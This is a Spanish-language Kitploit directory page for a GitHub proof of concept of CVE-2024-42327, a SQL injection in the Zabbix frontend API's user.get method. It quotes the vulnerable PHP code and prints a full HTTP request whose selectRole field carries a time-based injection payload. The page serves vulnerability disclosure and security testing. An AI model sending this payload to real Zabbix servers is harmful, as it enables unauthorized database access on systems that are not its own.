Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-42327 — Prueba de concepto de exploit para CVE-2024-42327, una vulnerabilidad de inyección SQL en la API del frontend de Zabbix que permite a usuarios no administradores ejecutar consultas SQL arbitrarias a través del método user.get. | Kitploit
Herramientas/GitHubGitHub/compr00t/cve-2024-42327
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubcompr00t/cve-2024-42327

CVE-2024-42327

Prueba de concepto de exploit para CVE-2024-42327, una vulnerabilidad de inyección SQL en la API del frontend de Zabbix que permite a usuarios no administradores ejecutar consultas SQL arbitrarias a través del método user.get.

Ver Repositorio
1858hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC para CVE-2024-42327 / ZBX-25623

Una cuenta de usuario no administrador en el frontend de Zabbix con el rol de Usuario predeterminado, o con cualquier otro rol que otorgue acceso a la API, puede explotar esta vulnerabilidad. Existe un SQLi en la clase CUser en la función addRelatedObjects; esta función es llamada desde la función CUser.get, la cual está disponible para todo usuario que tenga acceso a la API.

Descargo de responsabilidad

¡Este script se proporciona únicamente con fines educativos!

Prueba de Concepto

El siguiente código de la versión 6.0.31 es vulnerable a SQLi:

$db_roles = DBselect(
	'SELECT u.userid'.($options['selectRole'] ? ',r.'.implode(',r.', $options['selectRole']) : '').
	' FROM users u,role r'.
	' WHERE u.roleid=r.roleid'.
	' AND '.dbConditionInt('u.userid', $userIds)
);

La siguiente llamada desencadena la vulnerabilidad:

POST /api_jsonrpc.php HTTP/1.1
Host: localhost
User-Agent: curl/8.11.0
Accept: */*
Content-Type: application/json
Content-Length: 222
Connection: keep-alive

{
  "jsonrpc": "2.0",
  "method": "user.get",
  "params": {
    "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
    "userids": ["1","2"]
  },
  "id": 1,
  "auth": ""
}

Referencias

  • https://support.zabbix.com/browse/ZBX-25623
  • https://nvd.nist.gov/vuln/detail/CVE-2024-42327
Descargar herramienta